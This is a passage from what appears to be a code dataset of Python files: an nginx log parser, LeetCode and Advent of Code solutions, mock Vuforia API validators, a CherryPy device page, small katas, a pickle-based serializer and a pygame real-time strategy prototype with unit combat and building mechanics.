line.split(\",\")\n date_time_message = csv_list.pop(0).split(\" \",2)\n otherinfo = dict()\n\n for l in csv_list:\n kv = l.split(\":\",1)\n if len(kv)>0:\n value = strip(kv[1])\n if not value:\n value = \"-\"\n else:\n value = \"-\"\n otherinfo[strip(kv[0])] = value\n\n return date_time_message, otherinfo\n","sub_path":"sentrylogs/parsers/nginx.py","file_name":"nginx.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"128653975","text":"# !/usr/bin/env python\n# encoding: utf-8\n\"\"\"\n https://leetcode-cn.com/problems/letter-combinations-of-a-phone-number\n\"\"\"\nclass Solution(object):\n def letterCombinations(self, digits):\n if not digits or len(digits) == 0:\n return []\n\n map = {'2': \"abc\", '3': \"def\", '4': \"ghi\", '5': \"jkl\", '6': \"mno\", '7': \"pqrs\", '8': \"tuv\", '9': \"wxyz\"}\n res = []\n\n def combinations(string, level, digits, map):\n if len(digits) == len(string):\n res.append(string)\n return\n letter = map.get(digits[level])\n for i in range(len(letter)):\n combinations(string + letter[i], level + 1, digits, map)\n\n combinations('', 0, digits, map)\n return res\n","sub_path":"Week_03/letter_combinations_of_a_phone_number.py","file_name":"letter_combinations_of_a_phone_number.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"268351935","text":"import numpy as np\nfrom scipy.ndimage import convolve\n\nSERIAL = 7803\n\n# Calculate power level\ndef power(x,y):\n\treturn (x+10)*(y*(x+10)+SERIAL) // 100 % 10 -5\n\n# Solve power of individual cells\ncell = np.fromfunction(lambda i,j: power(i,j), (300,300), dtype=int)\n\n# Convolution Filter to calculate local power\nkernel = np.ones((3,3), dtype=int) # actual kernel is inverted in x and y\npower = convolve(cell, kernel, mode='constant', cval=0)\n\nhome = np.unravel_index(np.argmax(power), cell.shape) # Center of power\nprint(np.array(home)-1)","sub_path":"2018/Q11/q11_1.py","file_name":"q11_1.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"239752294","text":"\"\"\"\nInput validators to use in the mock.\n\"\"\"\n\nfrom typing import Dict, List\n\nfrom mock_vws.database import VuforiaDatabase\n\nfrom .active_flag_validators import validate_active_flag\nfrom .auth_validators import (\n validate_access_key_exists,\n validate_auth_header_exists,\n validate_auth_header_has_signature,\n validate_authorization,\n)\nfrom .content_length_validators import (\n validate_content_length_header_is_int,\n validate_content_length_header_not_too_large,\n validate_content_length_header_not_too_small,\n)\nfrom .content_type_validators import validate_content_type_header_given\nfrom .date_validators import (\n validate_date_format,\n validate_date_header_given,\n validate_date_in_range,\n)\nfrom .image_validators import (\n validate_image_color_space,\n validate_image_data_type,\n validate_image_encoding,\n validate_image_format,\n validate_image_is_image,\n validate_image_size,\n)\nfrom .json_validators import validate_json\nfrom .key_validators import validate_keys\nfrom .metadata_validators import (\n validate_metadata_encoding,\n validate_metadata_size,\n validate_metadata_type,\n)\nfrom .name_validators import (\n validate_name_characters_in_range,\n validate_name_length,\n validate_name_type,\n)\nfrom .project_state_validators import validate_project_state\nfrom .target_validators import validate_target_id_exists\nfrom .width_validators import validate_width\n\n\ndef run_services_validators(\n request_text: str,\n request_path: str,\n request_headers: Dict[str, str],\n request_body: bytes,\n request_method: str,\n databases: List[VuforiaDatabase],\n) -> None:\n \"\"\"\n Run all validators.\n\n Args:\n request_text: The content of the request.\n request_path: The path of the request.\n request_headers: The headers sent with the request.\n request_body: The body of the request.\n request_method: The HTTP method of the request.\n databases: All Vuforia databases.\n \"\"\"\n validate_auth_header_exists(request_headers=request_headers)\n validate_auth_header_has_signature(request_headers=request_headers)\n validate_access_key_exists(\n request_headers=request_headers,\n databases=databases,\n )\n validate_authorization(\n request_headers=request_headers,\n request_body=request_body,\n request_method=request_method,\n request_path=request_path,\n databases=databases,\n )\n validate_project_state(\n request_headers=request_headers,\n request_body=request_body,\n request_method=request_method,\n request_path=request_path,\n databases=databases,\n )\n validate_target_id_exists(\n request_headers=request_headers,\n request_body=request_body,\n request_method=request_method,\n request_path=request_path,\n databases=databases,\n )\n validate_json(\n request_text=request_text,\n request_body=request_body,\n request_method=request_method,\n )\n validate_keys(\n request_text=request_text,\n request_path=request_path,\n request_method=request_method,\n )\n validate_metadata_type(request_text=request_text)\n validate_metadata_encoding(request_text=request_text)\n validate_metadata_size(request_text=request_text)\n validate_active_flag(request_text=request_text)\n validate_image_data_type(request_text=request_text)\n validate_image_encoding(request_text=request_text)\n validate_image_is_image(request_text=request_text)\n validate_image_format(request_text=request_text)\n validate_image_color_space(request_text=request_text)\n\n validate_image_size(request_text=request_text)\n\n validate_name_type(request_text=request_text)\n validate_name_length(request_text=request_text)\n validate_name_characters_in_range(\n request_text=request_text,\n request_method=request_method,\n request_path=request_path,\n )\n\n validate_width(request_text=request_text)\n validate_content_type_header_given(\n request_headers=request_headers,\n request_method=request_method,\n )\n\n validate_date_header_given(request_headers=request_headers)\n\n validate_date_format(request_headers=request_headers)\n validate_date_in_range(request_headers=request_headers)\n\n validate_content_length_header_is_int(\n request_headers=request_headers,\n request_body=request_body,\n )\n validate_content_length_header_not_too_large(\n request_headers=request_headers,\n request_body=request_body,\n )\n\n validate_content_length_header_not_too_small(\n request_headers=request_headers,\n request_body=request_body,\n )\n","sub_path":"src/mock_vws/_services_validators/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"57301229","text":"#vim: ts=4 expandtab\n\nimport cherrypy\nimport json\n\nfrom smiljan.server.device import SmiljanDevice\nfrom smiljan.server.generic import GenericPage\n\nclass SmiljanAjax(GenericPage):\n\n def __init__(self, threads):\n self._device_info = {}\n for name, thread in threads.items():\n if thread.isAlive():\n setattr(self, name, SmiljanDevice(name, thread))\n self._device_info[name] = \\\n {\n \"parser\": thread.options[\"parser\"],\n \"samples_per_second\": thread._SAMPLE_HERTZ,\n }\n\n \"\"\" Get rid of removed device \"\"\"\n def report_terminate(self, name = \"\"):\n if name:\n del self._device_info[name]\n\n @cherrypy.expose\n def json_get_devices(self):\n cherrypy.response.headers['Content-Type'] = 'application/json'\n for name in self._device_info.keys():\n self._device_info[name][\"url\"] = cherrypy.url(\"/\" + name)\n\n return json.dumps(self._device_info, sort_keys=1, indent=4)\n\n\n @cherrypy.expose\n def index(self):\n if len(self._device_info) > 1:\n body = \"\\n\"\n for name in self._device_info.keys():\n body += \"\\t\\n\"\n body += \"\\t\\t\\n\"\n body += \"\\t\\n\"\n body += \"
\\n\"\n body += \"\\t\\t\\t %s Multimeter \\n\" % (cherrypy.url(\"/\" + name), name.upper())\n body += \"\\t\\n
\\n\"\n elif len(self._device_info) == 1:\n name = self._device_info.keys().pop()\n raise cherrypy.HTTPRedirect(cherrypy.url(\"/\" + name))\n else:\n body = \"No valid devices found!\"\n\n return super(SmiljanAjax, self).index(body = body)\n","sub_path":"smiljan/server/ajax.py","file_name":"ajax.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"218508907","text":"my_Number = int (input(\"Enter your Number: \"))\n\ndef division (num):\n flag = 0\n ret_val = num\n if num % 3 == 0:\n flag += 1\n ret_val = \"Fizz\"\n if num % 5 == 0:\n flag += 1\n ret_val = \"Buzz\"\n if flag == 2:\n ret_val =\"FizzBuzz\"\n return ret_val\n\nprint (division(my_Number))","sub_path":"7_divisiondecision.py","file_name":"7_divisiondecision.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"212878972","text":"#!/usr/bin/python\n#Cody Pinchot Babysitter kata\n#Valid format for times is \"10:00AM\"\n\nfrom datetime import datetime, timedelta\n\t\ndef checkstarttime(min_time,max_time,start_time): \n\tst = (datetime.strptime(start_time, \"%I:%M%p\").hour)\n\tmit = (datetime.strptime(min_time, \"%I:%M%p\").hour)\n\tmat = (datetime.strptime(max_time, \"%I:%M%p\").hour)\n\n\tif st < mit and st > mat:\n\t\treturn False\n\telse:\n\t\treturn True\n\ndef checkendtime(min_time,max_time,end_time):\n\tmat = (datetime.strptime(max_time, \"%I:%M%p\").hour)\n\tmit = (datetime.strptime(min_time, \"%I:%M%p\").hour)\n\tet = (datetime.strptime(end_time, \"%I:%M%p\").hour)\n\n\tif et > mat and et < mit:\n\t\treturn False\n\telse:\n\t\treturn True\n\ndef checkbedtimemin(start_time,bed_time,end_time):\n\tst = (datetime.strptime(start_time, \"%I:%M%p\").hour)\n\tet = (datetime.strptime(end_time, \"%I:%M%p\").hour)\n\tbt = (datetime.strptime(bed_time, \"%I:%M%p\").hour)\n\tif bt < st and bt < et:\n\t\treturn False\n\telse:\n\t\treturn True\n\ndef payrate(start_time,bed_time,end_time):\n\trate1 = 12\n\trate2 = 8\n\trate3 = 16\n\tst = ((datetime.strptime(start_time, \"%I:%M%p\")).hour)\n\tet = ((datetime.strptime(end_time, \"%I:%M%p\")).hour)\n\t\n\tif bed_time == \"\":\n\t\tif et <= 23 and et >= 5 and st <= 23 and st >= 5:\n\t\t\tpaycheck = rate1 * len(range(st,et))\n\t\t\treturn paycheck\n\t\telif st < 5 and et < 5:\n\t\t\tpaycheck = rate3 * len(range(st,et))\n\t\t\treturn paycheck\n\t\telse:\n\t\t\trate1hours = len(range(st,24))\n\t\t\trate3hours = len(range(0,et))\n\t\t\tpaycheck = (rate1 * rate1hours) + (rate3 * rate3hours)\n\t\t\treturn paycheck\n\telse:\n\t\tbt = ((datetime.strptime(bed_time, \"%I:%M%p\")).hour)\n\t\tif bt <= 23 and bt >= 5 and st > 5:\n\t\t\trate1hours = len(range(st,bt))\n\t\t\trate2hours = len(range(bt,24))\n\t\t\trate3hours = len(range(0,et))\n\t\t\tpaycheck = (rate1 * rate1hours) + (rate2 * rate2hours) + (rate3 * rate3hours)\n\t\t\treturn paycheck\n\t\telif st < 5:\n\t\t\trate3hours = len(range(st,et))\n\t\t\tpaycheck = (rate3 * rate3hours)\n\t\t\treturn paycheck\n\t\telse:\n\t\t\trate1hours = len(range(st,24))\n\t\t\trate3hours = len(range(0,et))\n\t\t\tpaycheck = (rate1 * rate1hours) + (rate3 * rate3hours)\n\t\t\treturn paycheck\t\n\n#def main():\n\n#main()","sub_path":"babysitter.py","file_name":"babysitter.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"19813245","text":"class Solution:\n def fourSum(self, nums: List[int], target: int) -> List[List[int]]:\n if nums == 0 and len(nums)<=3:\n return []\n\n n = len(nums)\n nums.sort() \n ans = list()\n \n for d in range(n-3):\n if d > 0 and nums[d] == nums[d - 1]: \n continue\n for first in range(d+1, n-2):\n if first > d+1 and nums[first] == nums[first - 1]: \n continue\n third = n - 1\n tar = target - nums[first] - nums[d]\n for second in range(first + 1, n-1):\n if second > first + 1 and nums[second] == nums[second - 1]:\n continue\n while second < third and nums[second] + nums[third] > tar:\n third -= 1\n if second == third:\n break\n if nums[second] + nums[third] == tar:\n ans.append([nums[d], nums[first], nums[second], nums[third]])\n \n return ans","sub_path":"Week_05/foursum.py","file_name":"foursum.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"522880544","text":"import pickle\r\nimport cloudpickle\r\nfrom Serializer.base_json_serializer import BaseJsonSerializer\r\n\r\n\r\nclass PickleSerializer(BaseJsonSerializer):\r\n @classmethod\r\n def dump(cls, python_object, file_name):\r\n try:\r\n with open(file_name, 'wb') as wfb:\r\n if(cls.is_lambda_function(python_object)):\r\n pickle.dump(cloudpickle.dumps(python_object), wfb)\r\n else:\r\n pickle.dump(python_object, wfb)\r\n except TypeError:\r\n pass\r\n\r\n @classmethod\r\n def dumps(cls, python_object):\r\n try:\r\n if(cls.is_lambda_function(python_object)):\r\n return cloudpickle.dumps(python_object)\r\n else:\r\n return pickle.dumps(python_object)\r\n except TypeError:\r\n return None\r\n\r\n @classmethod\r\n def load(cls, file_name):\r\n try:\r\n with open(file_name, 'rb') as rfb:\r\n object_from_file = pickle.load(rfb)\r\n with open(file_name, 'rb') as rfb:\r\n if type(object_from_file) is bytes:\r\n return pickle.loads(pickle.load(rfb))\r\n else:\r\n return pickle.load(rfb)\r\n except (FileNotFoundError, TypeError):\r\n return None\r\n\r\n @classmethod\r\n def loads(cls, str_to_deserialize):\r\n\r\n try:\r\n return pickle.loads(str_to_deserialize)\r\n except TypeError:\r\n return None\r\n","sub_path":"Python_Serializer/Serializer/pickle_serializer.py","file_name":"pickle_serializer.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"393173893","text":"\n\n#calss header\nclass _INPUT():\n\tdef __init__(self,): \n\t\tself.name = \"INPUT\"\n\t\tself.definitions = [u'to put information into a computer or other piece of electronic equipment: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_input.py","file_name":"_input.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"445303597","text":"import pygame, os, math\nfrom pygame.locals import *\npygame.init()\n\nclass Vector():\n '''\n Class:\n creates operations to handle vectors such\n as direction, position, and speed\n '''\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __str__(self): # used for printing vectors\n return \"(%s, %s)\"%(self.x, self.y)\n\n def __getitem__(self, key):\n if key == 0:\n return self.x\n elif key == 1:\n return self.y\n else:\n raise IndexError(\"This \"+str(key)+\" key is not a vector key!\")\n\n def __sub__(self, o): # subtraction\n return Vector(self.x - o.x, self.y - o.y)\n\n def length(self): # get length (used for normalize)\n return math.sqrt((self.x**2 + self.y**2)) \n\n def normalize(self): # divides a vector by its length\n l = self.length()\n if l != 0:\n return (self.x / l, self.y / l)\n return None\n\nclass Sprite(pygame.sprite.Sprite):\n \n def __init__(self, Type):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(os.path.join('sprites', Type.Image1))\n self.rect = self.image.get_rect()\n self.image.set_colorkey((255,255,255))\n self.Type = Type\n self.isAttack = False\n self.isBuilding = False\n self.attackCounter = 0\n self.researchCounter = 0\n\n self.trueX = Type.x # created because self.rect.center does not hold\n self.trueY = Type.y # decimal values but these do\n self.rect.center = (self.trueX, self.trueY) # set starting position\n self.speed = Type.Speed # movement speed of the sprite\n self.speedX = 0 # speed in x direction\n self.speedY = 0 # speed in y direction\n try:\n self.Health = Type.unitHealth #local store of class health amount\n except:\n self.Health = 0\n\n self.targetSprite = None #start with no sprite targetted (for attacks only)\n self.target = None #start with no destination\n\n def get_direction(self, target):\n '''\n Function:\n takes total distance from sprite.center\n to the sprites target\n (gets direction to move)\n Returns:\n a normalized vector\n Parameters:\n - self\n - target\n x,y coordinates of the sprites target\n can be any x,y coorinate pair in\n brackets [x,y]\n or parentheses (x,y)\n '''\n if self.target: # if the square has a target\n position = Vector(self.rect.centerx, self.rect.centery) # create a vector from center x,y value\n target = Vector(target[0], target[1]) # and one from the target x,y\n self.dist = target - position # get total distance between target and position\n\n direction = self.dist.normalize() # normalize so its constant in all directions\n return direction\n\n def distance_check(self, dist):\n '''\n Function:\n tests if the total distance from the\n sprite to the target is smaller than the\n ammount of distance that would be normal\n for the sprite to travel\n (this lets the sprite know if it needs\n to slow down. we want it to slow\n down before it gets to it's target)\n Returns:\n bool\n Parameters:\n - self\n - dist\n this is the total distance from the\n sprite to the target\n can be any x,y value pair in\n brackets [x,y]\n or parentheses (x,y)\n '''\n dist_x = dist[0] ** 2 # gets absolute value of the x distance\n dist_y = dist[1] ** 2 # gets absolute value of the y distance\n t_dist = dist_x + dist_y # gets total absolute value distance\n speed = self.speed ** 2 # gets aboslute value of the speed\n\n if t_dist < (speed): # read function description above\n return True\n\n \n\n def updatePosition(self, AttackList):\n '''\n Function:\n gets direction to move then applies\n the distance to the sprite.center\n ()\n Parameters:\n - self\n '''\n \n if self.targetSprite != None:\n if self.targetSprite.Health <= 0:\n self.targetSprite = None\n if self.isAttack == True:\n self.kill()\n else:\n if self.isAttack == False:\n actualDist = rangeCheck(self, self.targetSprite)\n if actualDist <= (self.Type.attackType.attackRange * 50 + (self.targetSprite.Type.size)) and self.attackCounter >= (self.Type.attackType.attackCooldown * 30): #range check\n AttackList.add(Sprite(self.Type.attackType))\n thisAttack = getSpriteByPosition(len(AttackList) - 1, AttackList)\n thisAttack.isAttack = True\n thisAttack.trueX = self.trueX #sets start pos\n thisAttack.trueY = self.trueY\n thisAttack.targetSprite = self.targetSprite #saves target sprite for retargetting\n thisAttack.target = self.targetSprite.rect.center #sets target\n if self.Type.attackType.Name == \"Volatile Burst\":\n self.kill()\n self.target = None\n elif actualDist > (self.Type.attackType.attackRange * 50 + (self.targetSprite.Type.size)):\n self.target = self.targetSprite.rect.center\n else:\n self.target = self.targetSprite.rect.center\n \n self.dir = self.get_direction(self.target) # get direction\n if self.dir: # if there is a direction to move\n \n if self.distance_check(self.dist): # if we need to stop\n self.rect.center = self.target # center the sprite on the target\n \n else: # if we need to move normal\n self.trueX += (self.dir[0] * self.speed) # calculate speed from direction to move and speed constant\n self.trueY += (self.dir[1] * self.speed)\n self.rect.center = (round(self.trueX),round(self.trueY)) # apply values to sprite.center\n\n angleRad = math.atan2(self.dist[1], self.dist[0]) #finds angle\n angleDeg = math.degrees(angleRad) #converts to degrees\n self.image = pygame.transform.rotate(self.image, (-angleDeg - 90)) #rotates sprite to match, and adjusts angle\n return AttackList \n \n def updateAnim(self, animCounter):\n if animCounter >= 15 and animCounter <= 29:\n self.image = pygame.image.load(os.path.join('sprites', self.Type.Image2))\n self.image.set_colorkey((255,255,255)) #half the time use sprite 2\n animCounter += 1\n elif animCounter >= 0 and animCounter <= 14:\n self.image = pygame.image.load(os.path.join('sprites', self.Type.Image1))\n self.image.set_colorkey((255,255,255)) #otherwise use 1\n animCounter += 1\n else:\n animCounter = 0\n self.image = pygame.image.load(os.path.join('sprites', self.Type.Image1))\n self.image.set_colorkey((255,255,255)) #reset counter, and use 1\n return animCounter\n\nclass unitType():\n Name = \"\"\n x = 100\n y = 100\n size = 64\n Image1 = None\n Image2 = None\n Speed = 0.0\n Team = None\n buildTime = 0\n unitAttack = None\n unitHealth = 100\n unitFlying = False\n\nclass attackType():\n x = 100\n y = 100\n size = 32\n Image1 = None\n Image2 = None\n Speed = 10\n Name = \"\"\n attackDamage = 0\n attackAir = False\n attackGround = False\n attackRange = 0\n attackCooldown = 0.0\n\n def TakeDamage(self, Sprite):\n if Sprite.Type.unitFlying == True:\n Sprite.Health -= (self.attackDamage * self.attackAir) #multiply damamge by flying or not, to cancel out if can't hit air/ground\n else:\n Sprite.Health -= (self.attackDamage * self.attackGround)\n\nclass buildingType():\n x = 100\n y = 100\n size = 128\n unitHealth = 100\n Image1 = None\n Speed = 0\n Name = \"\"\n Team = None\n unitFlying = False\n isResearching = False\n researchType = None\n hotKey = [] #letters associated with the units in unitorder\n unitOrder = [] #the units which correspond to the letter of the same index in hotKeys\n\n def research(self, selectedObject, letter):\n keyUsed = False\n usedAt = 0\n for n in range(0, len(selectedObject.Type.hotKey)): #find index of key used, if it it\n if selectedObject.Type.hotKey[n] == letter:\n keyUsed = True\n usedAt = n\n if keyUsed == True:\n selectedObject.Type.isResearching = True #starts research/build required item, if this key is used\n for object in unitTypeList:\n if object.Name == selectedObject.Type.unitOrder[usedAt]:\n selectedObject.Type.researchType = object #sets the research type to a unit\n\ndef getSpriteByPosition(position,group):\n for index,spr in enumerate(group):\n if (index == position):\n return spr\n return False\n\ndef approxEquals(clickedObject,x2,y2):\n if clickedObject.trueX < (x2 + (clickedObject.Type.size / 2)) and clickedObject.trueX > (x2 - (clickedObject.Type.size / 2)) and clickedObject.trueY < (y2 + (clickedObject.Type.size / 2)) and clickedObject.trueY > (y2 - (clickedObject.Type.size / 2)):\n return True\n else:\n return False\n\ndef rangeCheck(selectedObject, target):\n objPosition = Vector(selectedObject.rect.centerx, selectedObject.rect.centery)\n targetPosition = Vector(target.rect.centerx, target.rect.centery)\n vectorDist = targetPosition - objPosition\n actualDist = vectorDist.length() #finds length between units\n return actualDist\n \n\ndef main(animCounter, unitTypeList, attackTypeList, buildingTypeList):\n screenSize = [800,600]\n screen = pygame.display.set_mode((screenSize[0],screenSize[1])) #initial settings\n pygame.display.set_caption(\"Attack Test 2 - Auto & Building\")\n background_image = pygame.image.load(os.path.join('sprites', 'TempBG 3600x600.png')).convert()\n imageSize = [3600,600]\n horCoordinate = 0 #bg scrolling vars\n verCoordinate = 0\n horVelocity = 0\n verVelocity = 0\n minVer = 0\n minHor = 0\n maxVer = imageSize[1] - screenSize[1]\n maxHor = imageSize[0] - screenSize[0]\n \n \n UnitList = pygame.sprite.OrderedUpdates() #list holding all sprites of Units\n AttackList = pygame.sprite.OrderedUpdates()\n BuildingList = pygame.sprite.OrderedUpdates()\n\n for object in buildingTypeList:\n # create the sprite\n BuildingList.add(Sprite(object))\n thisBuilding = getSpriteByPosition(len(BuildingList) - 1, BuildingList)\n thisBuilding.isBuilding = True\n\n selectedObject = None\n\n clock = pygame.time.Clock()\n running = True\n\n while running:\n clock.tick(30)\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == MOUSEBUTTONDOWN:\n if event.button == 1: #on left click\n changed = False\n for object in UnitList: #for all sprites\n if approxEquals(object, event.pos[0], event.pos[1]):\n selectedObject = object #set new selected sprite\n changed = True\n for object in BuildingList: #for all buildings too\n if approxEquals(object, event.pos[0], event.pos[1]):\n selectedObject = object #set new selected sprite\n changed = True\n if changed == False: #checks if the background was selected, and sets no selected object\n selectedObject = None\n if event.button == 3:\n if selectedObject != None:\n if selectedObject.isBuilding != True:\n attacked = False\n for object in UnitList: #for all sprites\n if attacked == False and approxEquals(object, event.pos[0], event.pos[1]) and object != selectedObject and object.Type.Team != selectedObject.Type.Team and (selectedObject.Type.attackType.attackAir == object.Type.unitFlying or selectedObject.Type.attackType.attackGround != object.Type.unitFlying):\n #check distance is less than range\n actualDist = rangeCheck(selectedObject, object)\n if actualDist <= (selectedObject.Type.attackType.attackRange * 50 + (object.Type.size)) and selectedObject.attackCounter >= (selectedObject.Type.attackType.attackCooldown * 30): #range check\n AttackList.add(Sprite(selectedObject.Type.attackType))\n thisAttack = getSpriteByPosition(len(AttackList) - 1, AttackList)\n thisAttack.isAttack = True\n thisAttack.trueX = selectedObject.trueX #sets start pos\n thisAttack.trueY = selectedObject.trueY\n thisAttack.targetSprite = object #saves target sprite for retargetting\n thisAttack.target = object.rect.center #sets target\n if selectedObject.Type.attackType.Name == \"Volatile Burst\":\n selectedObject.kill()\n attacked = True\n selectedObject.attackCounter = 0\n selectedObject.targetSprite = object\n selectedObject.target = None\n elif (actualDist > (selectedObject.Type.attackType.attackRange * 50 + (object.Type.size))) or (actualDist <= (selectedObject.Type.attackType.attackRange * 50 + (object.Type.size)) and selectedObject.attackCounter < (selectedObject.Type.attackType.attackCooldown * 30)):\n selectedObject.targetSprite = object\n attacked = True\n for object in BuildingList: #for all sprites\n if attacked == False and approxEquals(object, event.pos[0], event.pos[1]) and object != selectedObject and object.Type.Team != selectedObject.Type.Team and (selectedObject.Type.attackType.attackAir == object.Type.unitFlying or selectedObject.Type.attackType.attackGround != object.Type.unitFlying):\n #check distance is less than range\n actualDist = rangeCheck(selectedObject, object)\n if actualDist <= (selectedObject.Type.attackType.attackRange * 50 + (object.Type.size)) and selectedObject.attackCounter >= (selectedObject.Type.attackType.attackCooldown * 30): #range check\n AttackList.add(Sprite(selectedObject.Type.attackType))\n thisAttack = getSpriteByPosition(len(AttackList) - 1, AttackList)\n thisAttack.isAttack = True\n thisAttack.trueX = selectedObject.trueX #sets start pos\n thisAttack.trueY = selectedObject.trueY\n thisAttack.targetSprite = object #saves target sprite for retargetting\n thisAttack.target = object.rect.center #sets target\n if selectedObject.Type.attackType.Name == \"Volatile Burst\":\n selectedObject.kill()\n attacked = True\n selectedObject.attackCounter = 0\n selectedObject.targetSprite = object\n selectedObject.target = None\n elif (actualDist > (selectedObject.Type.attackType.attackRange * 50 + (object.Type.size))) or (actualDist <= (selectedObject.Type.attackType.attackRange * 50 + (object.Type.size)) and selectedObject.attackCounter < (selectedObject.Type.attackType.attackCooldown * 30)):\n selectedObject.targetSprite = object\n attacked = True\n if attacked == False: #checks if nothing was attacked\n selectedObject.target = event.pos # set the sprite.target to the mouse click position\n selectedObject.targetSprite = None #no enemy target\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_a: #keydown a\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False:\n selectedObject.Type.research(selectedObject, \"a\")\n if event.key == pygame.K_c: #keydown c\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False:\n selectedObject.Type.research(selectedObject, \"c\")\n if event.key == pygame.K_d: #keydown d\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False:\n selectedObject.Type.research(selectedObject, \"d\")\n if event.key == pygame.K_e: #keydown e\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False:\n selectedObject.Type.research(selectedObject, \"e\")\n if event.key == pygame.K_h: #keydown h\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False:\n selectedObject.Type.research(selectedObject, \"h\")\n if event.key == pygame.K_i: #keydown i\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False:\n selectedObject.Type.research(selectedObject, \"i\")\n if event.key == pygame.K_r: #keydown r\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False:\n selectedObject.Type.research(selectedObject, \"r\")\n if event.key == pygame.K_s: #keydown s\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False:\n selectedObject.Type.research(selectedObject, \"s\")\n if event.key == pygame.K_t: #keydown t\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False:\n selectedObject.Type.research(selectedObject, \"t\")\n if event.key == pygame.K_v: #keydown v\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False:\n selectedObject.Type.research(selectedObject, \"v\")\n if event.key == pygame.K_x: #keydown x\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False:\n selectedObject.Type.research(selectedObject, \"x\")\n if event.key == pygame.K_z: #keydown z\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False: #if a building and not researching\n selectedObject.Type.research(selectedObject, \"z\") #research this building's z, if it has one.\n if event.key == pygame.K_ESCAPE:\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == True:\n selectedObject.Type.isResearching = False\n selectedObject.researchCounter = 0\n selectedObject.Type.researchType = None\n originalImage = pygame.image.load(os.path.join('sprites', selectedObject.Type.Image1))\n selectedObject.image.blit(originalImage, originalImage.get_rect())\n if event.key == pygame.K_RIGHT: #sets bg scrolling on\n horVelocity += 10\n if event.key == pygame.K_LEFT:\n horVelocity -= 10\n if event.key == pygame.K_UP:\n verVelocity -= 10\n if event.key == pygame.K_DOWN:\n verVelocity += 10\n if event.type == pygame.KEYUP: \n if event.key == pygame.K_RIGHT:\n horVelocity -= 10\n if event.key == pygame.K_LEFT: #sets bg scrolling off\n horVelocity += 10\n if event.key == pygame.K_UP:\n verVelocity += 10\n if event.key == pygame.K_DOWN:\n verVelocity -= 10\n\n if horVelocity or verVelocity != 0:\n horCoordinate += horVelocity #moves bg when key held\n verCoordinate += verVelocity\n\n AllSprites = [UnitList, AttackList, BuildingList]#define list of all lists\n for object in AllSprites: #move all sprites too\n for object in object:\n if horCoordinate <= maxHor and horCoordinate >= minHor: #adjust x postition unless at edge\n object.trueX -= horVelocity\n if object.isBuilding == False and object.isAttack == False and object.target != None:\n object.target = ((object.target[0] - horVelocity), object.target[1])\n if verCoordinate <= maxVer and verCoordinate >= minVer: #adjust y position\n object.trueY -= verVelocity\n if object.isBuilding == False and object.isAttack == False and object.target != None:\n object.target = ((object.target[0]), (object.target[1] - verVelocity))\n object.rect.center = (round(object.trueX),round(object.trueY))\n \n if horCoordinate > maxHor: #stops at edges of bg\n horCoordinate = maxHor\n if horCoordinate < minHor:\n horCoordinate = minHor\n if verCoordinate > maxVer:\n verCoordinate = maxVer\n if verCoordinate < minVer:\n verCoordinate = minVer\n \n screen.fill((0,0,0))\n viewport = background_image.subsurface((horCoordinate, verCoordinate) + (800, 600))\n screen.blit(viewport, (0,0))\n \n #auto attack\n for a in UnitList:\n for object in UnitList:\n actualDist = rangeCheck(a, object)\n if (a.target == a.rect.center or a.target == None) and actualDist <= (a.Type.attackType.attackRange * 50 + (object.Type.size)) and a.attackCounter >= (a.Type.attackType.attackCooldown * 30) and a != object and a.Type.Team != object.Type.Team and (a.Type.attackType.attackAir == object.Type.unitFlying or a.Type.attackType.attackGround != object.Type.unitFlying):\n AttackList.add(Sprite(a.Type.attackType))\n thisAttack = getSpriteByPosition(len(AttackList) - 1, AttackList)\n thisAttack.isAttack = True\n thisAttack.trueX = a.trueX #sets start pos\n thisAttack.trueY = a.trueY\n 